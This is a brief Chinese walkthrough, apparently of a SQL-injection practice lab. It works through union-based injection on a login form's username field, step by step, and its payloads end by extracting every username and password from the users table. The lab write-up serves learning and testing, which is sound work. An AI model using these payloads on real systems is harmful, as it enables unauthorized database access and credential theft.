初始界面:
在Username输入admin",Password随便输入。
根据报错内容,知道对ID的处理是在后边加上")。
uname=ad")order by 2#&passwd=admin&submit=Submit
uname=ad")order by 3#&passwd=admin&submit=Submit
判断字段数为2,接下来确定回显位置
uname=ad") union select 1,2#&passwd=admin&submit=Submit
查看当前数据库及当前用户
uname=ad") union select user(),database()#&passwd=admin&submit=Submit
查看security库下的所有表
uname=ad") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security')#&passwd=admin&submit=Submit
查看users表下的所有字段
uname=ad") union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users')#&passwd=admin&submit=Submit
查看username和password字段的值
uname=ad") union select 1,(select group_concat(username,password) from security.users)#&passwd=admin&submit=Submit